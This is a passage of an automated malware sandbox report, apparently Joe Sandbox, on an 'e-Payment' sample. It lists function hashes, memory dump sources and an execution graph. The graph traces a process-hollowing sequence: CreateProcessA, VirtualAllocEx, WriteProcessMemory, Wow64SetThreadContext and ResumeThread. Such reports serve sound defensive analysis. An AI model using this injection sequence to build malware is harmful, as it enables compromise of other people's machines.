                              • Instruction ID: f38fb0df2cf84a59f3517ad2bf224a4084f393d5d2871027c56ec0a8ae66ac71
                              • Opcode Fuzzy Hash: 772ae58263d93f23f989a7035e7ad22bc7242b07b34950895b709846d9b3c804
                              • Instruction Fuzzy Hash: BF1158719043488FDB14DFAAC4447EFFBF4EB48324F248459D559A7240C775A941CBA4
                              Function 023C0F00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 289646daabf9447da47bde071efe008778031bc4500ec5e7075372faba023619
                              • Instruction ID: 6bdc711ca68f6b30dd60a3333f580aaacdae4ada04012253fc82a6f42e7e2044
                              • Opcode Fuzzy Hash: 289646daabf9447da47bde071efe008778031bc4500ec5e7075372faba023619
                              • Instruction Fuzzy Hash: 691155719003488FDB24DFAAC4447EFFBF4EB88324F20842AD519A7240C779A940CBA4
                              Function 0065AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0065AFFE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: c5b087aa43568da12750058df53de1c3c73690589f17ecb3e1a444f30138bd89
                              • Instruction ID: ca7fc35aa1b04fa0b9d99ef97eba4f79e48d015f1ff27d5788f80b10f7ec6767
                              • Opcode Fuzzy Hash: c5b087aa43568da12750058df53de1c3c73690589f17ecb3e1a444f30138bd89
                              • Instruction Fuzzy Hash: 16110FB6C002498FCB20CF9AC844BDEFBF5EB88324F10842AD828A7250D375A545CFA1
                              Function 023C1910 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 023C607D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 19e31c8374b80ea04d90bbb4a76f753f1cc6e1af5d4a7e077110d966323bc808
                              • Instruction ID: f3afdd143433da49223718daa840c1a9c9e706a9ddf5a38d2772841b9b79bd5b
                              • Opcode Fuzzy Hash: 19e31c8374b80ea04d90bbb4a76f753f1cc6e1af5d4a7e077110d966323bc808
                              • Instruction Fuzzy Hash: 6211F2B58043499FDB20DF9AD845BDEBBF8EB48320F20845AE919A7241C375A944CFA5
                              Function 023C6018 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 023C607D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: d42513bc74eb8bb7d7c37f952fa1be790ca515b9903bdfbe9339e00435a33890
                              • Instruction ID: c02c0d3178cce68597f77334ffc40983e1c0790c1b76c8d3074fab649fd9fe96
                              • Opcode Fuzzy Hash: d42513bc74eb8bb7d7c37f952fa1be790ca515b9903bdfbe9339e00435a33890
                              • Instruction Fuzzy Hash: D211F2B5900348CFDB10DF99D485BEEBBF8EB48320F20845AE958A7650C375A984CFA5
                              Function 0060D1D4 Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407471192.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_60d000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 851d3578b7efe78b83ee106ac49c9590704f83a3cf6e6ef72706e9700bdb3613
                              • Instruction ID: 266ff8cad050030f941f75af9aed01a0c5f77d7a0764ccb3b8a47041f4624812
                              • Opcode Fuzzy Hash: 851d3578b7efe78b83ee106ac49c9590704f83a3cf6e6ef72706e9700bdb3613
                              • Instruction Fuzzy Hash: E7213471544304EFDB09DF90D9C0B27BBA2FB84314F20C6ADEA094B382C336D946CA61
                              Function 0060D01C Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407471192.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_60d000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f7475a47dd94035a83c1dc523c5179f34f81e225a0c161cdc31794ba0fb81527
                              • Instruction ID: 3cba509c5005804d3652d90c52d453223f9864d3425114e172d3b002224ed524
                              • Opcode Fuzzy Hash: f7475a47dd94035a83c1dc523c5179f34f81e225a0c161cdc31794ba0fb81527
                              • Instruction Fuzzy Hash: 9021D371644204EFDB18DF54D984B17BBA6EB84314F20C669E84E4B386C336D847CA62
                              Function 0060D006 Relevance: .1, Instructions: 62COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407471192.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_60d000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c28ad3ccb8fc3c101f2d7ac64a6edf51da6c57475097a2a2d373efa503b68275
                              • Instruction ID: 175df013973135291e07e506d38a78a79beb0091ab9e7e0ea7c5b246836437fa
                              • Opcode Fuzzy Hash: c28ad3ccb8fc3c101f2d7ac64a6edf51da6c57475097a2a2d373efa503b68275
                              • Instruction Fuzzy Hash: 9E21B3755493808FC716CF20C990712BF72EB46314F28C6DAD8498F6A3C33A980ACB62
                              Function 0060D1CF Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407471192.000000000060D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0060D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_60d000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                              • Instruction ID: 4273985f98794157109db85ffd8a30a081ce5308168b2e3e2bcf13db1353e2fc
                              • Opcode Fuzzy Hash: b45452ff36ccf171b58ba96a6db3430600b1fbfab4e67b74f20ffb50b37cf843
                              • Instruction Fuzzy Hash: 5611BB75544280DFCB16CF54C5C4B56BBA2FB84314F24C6AAD9494B796C33AD80ACB61

                              Non-executed Functions

                              Function 023C02A0 Relevance: .3, Instructions: 312COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b6df13fd32c6a9b9ddbeab875cdfd0f36fb15d5620be779dbd8fefb323c19de6
                              • Instruction ID: 10e5be9399bf144211839069af0eaff0419bf0e6cae7cfc51e2f5eb068f50335
                              • Opcode Fuzzy Hash: b6df13fd32c6a9b9ddbeab875cdfd0f36fb15d5620be779dbd8fefb323c19de6
                              • Instruction Fuzzy Hash: 45E11674E10259CFDB14DFA9C580AAEBBB2FF89304F248169D805AB359C731AD41CF61
                              Function 023C1088 Relevance: .3, Instructions: 312COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6b21ceb0cdf4023b8b2ee0c5f2902453475de85c1bb0454ec4263bc134a80f8c
                              • Instruction ID: 901bcab96510287bc0639f41476ba45d7d98a1e03fbd462678272e3b2ecf8288
                              • Opcode Fuzzy Hash: 6b21ceb0cdf4023b8b2ee0c5f2902453475de85c1bb0454ec4263bc134a80f8c
                              • Instruction Fuzzy Hash: F7E11A74E102198FDB14DFA9C580AAEFBF2BF89304F248169D449AB35AD731AD41CF61
                              Function 023C06D8 Relevance: .3, Instructions: 312COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bbd416865fc764b1177041ed76b9ca06c2d479a5a44a43f2ec4ae216e2df1763
                              • Instruction ID: 6585df8f710602b10342545efe96f06da2f223611cc0ad65781a247cdf2180c7
                              • Opcode Fuzzy Hash: bbd416865fc764b1177041ed76b9ca06c2d479a5a44a43f2ec4ae216e2df1763
                              • Instruction Fuzzy Hash: F0E11974E10259CFDB14DFA9C580AAEFBB2BF89304F248169D815AB359C731AD41CFA1
                              Function 0065D5BC Relevance: .3, Instructions: 264COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1407866025.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_650000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a30d4622c4c2fed1efa6691e86de77c3d252b90d7755ef54cce1051f37e7c25
                              • Instruction ID: 9795069e72e9a6bae5cb4497434d10f4fa1e4b3e21b497d253dc18f0acb5a690
                              • Opcode Fuzzy Hash: 2a30d4622c4c2fed1efa6691e86de77c3d252b90d7755ef54cce1051f37e7c25
                              • Instruction Fuzzy Hash: 27A13936E00609CFCF19DFA4C8445DEB7B6FF85301B15857AE806AB265DB71E919CB80
                              Function 023C0290 Relevance: .1, Instructions: 133COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1408797130.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_23c0000_e-Payment.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b142d5e5f0d852eb234be661314effbbf878eed0a32c37c1cc3d4640f44036b3
                              • Instruction ID: 277becc0be73552624349163d8406959f201cac674409cfd3be5bf4fa01a4938
                              • Opcode Fuzzy Hash: b142d5e5f0d852eb234be661314effbbf878eed0a32c37c1cc3d4640f44036b3
                              • Instruction Fuzzy Hash: 59512B70E052598FDB14DFA9C5805AEFBF2BF8A304F2481AAD458AB315D7319D41CFA1

                              Execution Graph

                              Execution Coverage:11.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:171
                              Total number of Limit Nodes:5
                              execution_graph 19623 280d040 19624 280d086 GetCurrentProcess 19623->19624 19626 280d0d1 19624->19626 19627 280d0d8 GetCurrentThread 19624->19627 19626->19627 19628 280d115 GetCurrentProcess 19627->19628 19629 280d10e 19627->19629 19630 280d14b 19628->19630 19629->19628 19631 280d173 GetCurrentThreadId 19630->19631 19632 280d1a4 19631->19632 19661 280d690 DuplicateHandle 19662 280d726 19661->19662 19663 280acb0 19664 280acbf 19663->19664 19667 280ad97 19663->19667 19675 280ada8 19663->19675 19668 280adb9 19667->19668 19669 280addc 19667->19669 19668->19669 19683 280b040 19668->19683 19687 280b031 19668->19687 19669->19664 19670 280add4 19670->19669 19671 280afe0 GetModuleHandleW 19670->19671 19672 280b00d 19671->19672 19672->19664 19676 280adb9 19675->19676 19678 280addc 19675->19678 19676->19678 19681 280b040 LoadLibraryExW 19676->19681 19682 280b031 LoadLibraryExW 19676->19682 19677 280add4 19677->19678 19679 280afe0 GetModuleHandleW 19677->19679 19678->19664 19680 280b00d 19679->19680 19680->19664 19681->19677 19682->19677 19684 280b054 19683->19684 19685 280b079 19684->19685 19691 280a130 19684->19691 19685->19670 19688 280b040 19687->19688 19689 280b079 19688->19689 19690 280a130 LoadLibraryExW 19688->19690 19689->19670 19690->19689 19692 280b220 LoadLibraryExW 19691->19692 19694 280b299 19692->19694 19694->19685 19633 48a5068 19634 48a51f3 19633->19634 19636 48a508e 19633->19636 19636->19634 19637 48a1910 19636->19637 19638 48a52e8 PostMessageW 19637->19638 19639 48a5354 19638->19639 19639->19636 19695 48a20bf 19699 48a2024 19695->19699 19696 48a238b 19699->19696 19700 48a3e4b 19699->19700 19716 48a3e58 19699->19716 19701 48a3e58 19700->19701 19708 48a3e96 19701->19708 19732 48a481d 19701->19732 19736 48a42fe 19701->19736 19741 48a4685 19701->19741 19746 48a4c40 19701->19746 19751 48a49e3 19701->19751 19756 48a4663 19701->19756 19761 48a444d 19701->19761 19769 48a4b2d 19701->19769 19773 48a43ce 19701->19773 19778 48a4ba9 19701->19778 19782 48a48d7 19701->19782 19786 48a42d1 19701->19786 19791 48a4ad2 19701->19791 19708->19696 19717 48a3e72 19716->19717 19718 48a3e96 19717->19718 19719 48a4ba9 2 API calls 19717->19719 19720 48a43ce 2 API calls 19717->19720 19721 48a4b2d 2 API calls 19717->19721 19722 48a444d 4 API calls 19717->19722 19723 48a4663 2 API calls 19717->19723 19724 48a49e3 2 API calls 19717->19724 19725 48a4c40 2 API calls 19717->19725 19726 48a4685 2 API calls 19717->19726 19727 48a42fe 2 API calls 19717->19727 19728 48a481d 2 API calls 19717->19728 19729 48a4ad2 2 API calls 19717->19729 19730 48a42d1 2 API calls 19717->19730 19731 48a48d7 2 API calls 19717->19731 19718->19696 19719->19718 19720->19718 19721->19718 19722->19718 19723->19718 19724->19718 19725->19718 19726->19718 19727->19718 19728->19718 19729->19718 19730->19718 19731->19718 19796 48a1578 19732->19796 19800 48a1580 19732->19800 19733 48a4844 19737 48a4304 19736->19737 19738 48a433b 19737->19738 19804 48a1c08 19737->19804 19808 48a1bfd 19737->19808 19738->19708 19742 48a4692 19741->19742 19812 48a0efb 19742->19812 19816 48a0f00 19742->19816 19743 48a4ce7 19747 48a4c69 19746->19747 19749 48a0efb ResumeThread 19747->19749 19750 48a0f00 ResumeThread 19747->19750 19748 48a4ce7 19749->19748 19750->19748 19752 48a49e9 19751->19752 19754 48a1578 WriteProcessMemory 19752->19754 19755 48a1580 WriteProcessMemory 19752->19755 19753 48a4a1e 19753->19708 19754->19753 19755->19753 19757 48a4bab 19756->19757 19758 48a449a 19756->19758 19820 48a0fb0 19757->19820 19824 48a0fa8 19757->19824 19758->19708 19828 48a14b8 19761->19828 19832 48a14c0 19761->19832 19762 48a446e 19764 48a4236 19762->19764 19767 48a1578 WriteProcessMemory 19762->19767 19768 48a1580 WriteProcessMemory 19762->19768 19763 48a4a1e 19763->19708 19764->19708 19767->19763 19768->19763 19771 48a0fa8 Wow64SetThreadContext 19769->19771 19772 48a0fb0 Wow64SetThreadContext 19769->19772 19770 48a4b2c 19770->19769 19771->19770 19772->19770 19774 48a43d4 19773->19774 19836 48a1668 19774->19836 19840 48a1670 19774->19840 19775 48a43fa 19775->19708 19779 48a4b2c 19778->19779 19779->19778 19780 48a0fa8 Wow64SetThreadContext 19779->19780 19781 48a0fb0 Wow64SetThreadContext 19779->19781 19780->19779 19781->19779 19784 48a1578 WriteProcessMemory 19782->19784 19785 48a1580 WriteProcessMemory 19782->19785 19783 48a490d 19784->19783 19785->19783 19787 48a42d4 19786->19787 19789 48a1c08 CreateProcessA 19787->19789 19790 48a1bfd CreateProcessA 19787->19790 19788 48a433b 19788->19708 19789->19788 19790->19788 19792 48a4adf 19791->19792 19794 48a0efb ResumeThread 19792->19794 19795 48a0f00 ResumeThread 19792->19795 19793 48a4ce7 19793->19793 19794->19793 19795->19793 19797 48a15c8 WriteProcessMemory 19796->19797 19799 48a161f 19797->19799 19799->19733 19801 48a15c8 WriteProcessMemory 19800->19801 19803 48a161f 19801->19803 19803->19733 19805 48a1c91 19804->19805 19805->19805 19806 48a1df6 CreateProcessA 19805->19806 19807 48a1e53 19806->19807 19809 48a1c91 19808->19809 19809->19809 19810 48a1df6 CreateProcessA 19809->19810 19811 48a1e53 19810->19811 19813 48a0f40 ResumeThread 19812->19813 19815 48a0f71 19813->19815 19815->19743 19817 48a0f40 ResumeThread 19816->19817 19819 48a0f71 19817->19819 19819->19743 19821 48a0ff5 Wow64SetThreadContext 19820->19821 19823 48a103d 19821->19823 19823->19758 19825 48a0ff5 Wow64SetThreadContext 19824->19825 19827 48a103d 19825->19827 19827->19758 19829 48a1500 VirtualAllocEx 19828->19829 19831 48a153d 19829->19831 19831->19762 19833 48a1500 VirtualAllocEx 19832->19833 19835 48a153d 19833->19835 19835->19762 19837 48a16bb ReadProcessMemory 19836->19837 19839 48a16ff 19837->19839 19839->19775 19841 48a16bb ReadProcessMemory 19840->19841 19843 48a16ff 19841->19843 19843->19775 19640 2804668 19641 280467a 19640->19641 19642 2804686 19641->19642 19644 2804779 19641->19644 19645 280479d 19644->19645 19649 2804879 19645->19649 19653 2804888 19645->19653 19646 28047a7 19646->19642 19650 28048af 19649->19650 19652 280498c 19650->19652 19657 28044c4 19650->19657 19652->19646 19654 28048af 19653->19654 19655 28044c4 CreateActCtxA 19654->19655 19656 280498c 19654->19656 19655->19656 19656->19646 19658 2805918 CreateActCtxA 19657->19658 19660 28059db 19658->19660

                              Executed Functions

                              Function 0280D031 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0280D0BE
                              • GetCurrentThread.KERNEL32 ref: 0280D0FB
                              • GetCurrentProcess.KERNEL32 ref: 0280D138
                              • GetCurrentThreadId.KERNEL32 ref: 0280D191
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: 64624d1186ebedeacdf662fe671920ed3e72f4c4342f20218363caf7e7cb664f
                              • Instruction ID: 5bac03418a9f2b5ed3a74cf62373f96ea75a04eb20e4780fe32faa564c2890fe
                              • Opcode Fuzzy Hash: 64624d1186ebedeacdf662fe671920ed3e72f4c4342f20218363caf7e7cb664f
                              • Instruction Fuzzy Hash: 915177B49003488FEB55DFA9D9487AEBBF1FF48314F20805DE009A7390CB759944CB25
                              Function 0280D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0280D0BE
                              • GetCurrentThread.KERNEL32 ref: 0280D0FB
                              • GetCurrentProcess.KERNEL32 ref: 0280D138
                              • GetCurrentThreadId.KERNEL32 ref: 0280D191
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: 55cdec9fec02c3ccdbe0309fe4ec11c67b52a9a3a776454f0438a46358bc1734
                              • Instruction ID: 16f506408965db8be092501c63bc9ee8dc0d31c969b8780233ea551ea6f25021
                              • Opcode Fuzzy Hash: 55cdec9fec02c3ccdbe0309fe4ec11c67b52a9a3a776454f0438a46358bc1734
                              • Instruction Fuzzy Hash: 355156B49003498FEB54DFA9D988BEEBBF1FF88314F208459E409A7390C775A944CB65
                              Function 048A1BFD Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 44 48a1bfd-48a1c9d 46 48a1c9f-48a1ca9 44->46 47 48a1cd6-48a1cf6 44->47 46->47 48 48a1cab-48a1cad 46->48 54 48a1cf8-48a1d02 47->54 55 48a1d2f-48a1d5e 47->55 49 48a1caf-48a1cb9 48->49 50 48a1cd0-48a1cd3 48->50 52 48a1cbb 49->52 53 48a1cbd-48a1ccc 49->53 50->47 52->53 53->53 56 48a1cce 53->56 54->55 57 48a1d04-48a1d06 54->57 61 48a1d60-48a1d6a 55->61 62 48a1d97-48a1e51 CreateProcessA 55->62 56->50 59 48a1d08-48a1d12 57->59 60 48a1d29-48a1d2c 57->60 63 48a1d16-48a1d25 59->63 64 48a1d14 59->64 60->55 61->62 65 48a1d6c-48a1d6e 61->65 75 48a1e5a-48a1ee0 62->75 76 48a1e53-48a1e59 62->76 63->63 66 48a1d27 63->66 64->63 67 48a1d70-48a1d7a 65->67 68 48a1d91-48a1d94 65->68 66->60 70 48a1d7e-48a1d8d 67->70 71 48a1d7c 67->71 68->62 70->70 72 48a1d8f 70->72 71->70 72->68 86 48a1ee2-48a1ee6 75->86 87 48a1ef0-48a1ef4 75->87 76->75 86->87 88 48a1ee8 86->88 89 48a1ef6-48a1efa 87->89 90 48a1f04-48a1f08 87->90 88->87 89->90 91 48a1efc 89->91 92 48a1f0a-48a1f0e 90->92 93 48a1f18-48a1f1c 90->93 91->90 92->93 96 48a1f10 92->96 94 48a1f2e-48a1f35 93->94 95 48a1f1e-48a1f24 93->95 97 48a1f4c 94->97 98 48a1f37-48a1f46 94->98 95->94 96->93 100 48a1f4d 97->100 98->97 100->100
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048A1E3E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 856f076e091c3e091a00c27487ab8d685ca0ea055a58d2a44c029337d264ee5b
                              • Instruction ID: 1c885de2473d43f6edaa9b7ce5c69ab2e75b3a7e78d60dbc89cd2933a5c5d3f8
                              • Opcode Fuzzy Hash: 856f076e091c3e091a00c27487ab8d685ca0ea055a58d2a44c029337d264ee5b
                              • Instruction Fuzzy Hash: FD916D71D002599FEF10CFA8C8457EEBBB2BF44314F148A69E809E7240DBB4A995CF91
                              Function 048A1C08 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 101 48a1c08-48a1c9d 103 48a1c9f-48a1ca9 101->103 104 48a1cd6-48a1cf6 101->104 103->104 105 48a1cab-48a1cad 103->105 111 48a1cf8-48a1d02 104->111 112 48a1d2f-48a1d5e 104->112 106 48a1caf-48a1cb9 105->106 107 48a1cd0-48a1cd3 105->107 109 48a1cbb 106->109 110 48a1cbd-48a1ccc 106->110 107->104 109->110 110->110 113 48a1cce 110->113 111->112 114 48a1d04-48a1d06 111->114 118 48a1d60-48a1d6a 112->118 119 48a1d97-48a1e51 CreateProcessA 112->119 113->107 116 48a1d08-48a1d12 114->116 117 48a1d29-48a1d2c 114->117 120 48a1d16-48a1d25 116->120 121 48a1d14 116->121 117->112 118->119 122 48a1d6c-48a1d6e 118->122 132 48a1e5a-48a1ee0 119->132 133 48a1e53-48a1e59 119->133 120->120 123 48a1d27 120->123 121->120 124 48a1d70-48a1d7a 122->124 125 48a1d91-48a1d94 122->125 123->117 127 48a1d7e-48a1d8d 124->127 128 48a1d7c 124->128 125->119 127->127 129 48a1d8f 127->129 128->127 129->125 143 48a1ee2-48a1ee6 132->143 144 48a1ef0-48a1ef4 132->144 133->132 143->144 145 48a1ee8 143->145 146 48a1ef6-48a1efa 144->146 147 48a1f04-48a1f08 144->147 145->144 146->147 148 48a1efc 146->148 149 48a1f0a-48a1f0e 147->149 150 48a1f18-48a1f1c 147->150 148->147 149->150 153 48a1f10 149->153 151 48a1f2e-48a1f35 150->151 152 48a1f1e-48a1f24 150->152 154 48a1f4c 151->154 155 48a1f37-48a1f46 151->155 152->151 153->150 157 48a1f4d 154->157 155->154 157->157
                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 048A1E3E
                              Memory Dump Source
                              • Source File: 00000009.00000002.1446810345.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_48a0000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: fee4a792c99e6c3cf810ac4a4b128a668e8603c3e56240d627bc37eab6a7c163
                              • Instruction ID: b41a9a6f1ef53feec7a4cb9931892595db78561e1bd47e997faf33924a6d7413
                              • Opcode Fuzzy Hash: fee4a792c99e6c3cf810ac4a4b128a668e8603c3e56240d627bc37eab6a7c163
                              • Instruction Fuzzy Hash: 9E916D71D006599FEB14CFA8C8447EEBBB2BF44314F148669E809E7240DBB4A995CF91
                              Function 0280ADA8 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 158 280ada8-280adb7 159 280ade3-280ade7 158->159 160 280adb9-280adc6 call 280a0cc 158->160 162 280ade9-280adf3 159->162 163 280adfb-280ae3c 159->163 167 280adc8 160->167 168 280addc 160->168 162->163 169 280ae49-280ae57 163->169 170 280ae3e-280ae46 163->170 213 280adce call 280b040 167->213 214 280adce call 280b031 167->214 168->159 171 280ae59-280ae5e 169->171 172 280ae7b-280ae7d 169->172 170->169 174 280ae60-280ae67 call 280a0d8 171->174 175 280ae69 171->175 176 280ae80-280ae87 172->176 173 280add4-280add6 173->168 177 280af18-280afd8 173->177 178 280ae6b-280ae79 174->178 175->178 180 280ae94-280ae9b 176->180 181 280ae89-280ae91 176->181 208 280afe0-280b00b GetModuleHandleW 177->208 209 280afda-280afdd 177->209 178->176 183 280aea8-280aeaa call 280a0e8 180->183 184 280ae9d-280aea5 180->184 181->180 188 280aeaf-280aeb1 183->188 184->183 189 280aeb3-280aebb 188->189 190 280aebe-280aec3 188->190 189->190 192 280aee1-280aeee 190->192 193 280aec5-280aecc 190->193 199 280aef0-280af0e 192->199 200 280af11-280af17 192->200 193->192 194 280aece-280aede call 280a0f8 call 280a108 193->194 194->192 199->200 210 280b014-280b028 208->210 211 280b00d-280b013 208->211 209->208 211->210 213->173 214->173
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0280AFFE
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_2800000_JXHPwNYzysUjKo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 76a7999dc46f75dad0351d189d80ae90b70383a8ec5ae30e53c4d76b156ac426
                              • Instruction ID: 9c70a09900733c91d7a3b26b43eba9dd400ce645c93b93f37eaad7298d82af3f
                              • Opcode Fuzzy Hash: 76a7999dc46f75dad0351d189d80ae90b70383a8ec5ae30e53c4d76b156ac426
                              • Instruction Fuzzy Hash: B4714978A00B058FD768DF29D88079AB7F1FF88314F008A2DD58AD7A90D775E949CB91
                              Function 028044C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 215 28044c4-28059d9 CreateActCtxA 218 28059e2-2805a3c 215->218 219 28059db-28059e1 215->219 226 2805a4b-2805a4f 218->226 227 2805a3e-2805a41 218->227 219->218 228 2805a60-2805a90 226->228 229 2805a51-2805a5d 226->229 227->226 233 2805a42-2805a47 228->233 234 2805a92-2805b14 228->234 229->228 233->226
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 028059C9
                              Memory Dump Source
                              • Source File: 00000009.00000002.1444401005.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                              Joe Sandbox IDA Plugin
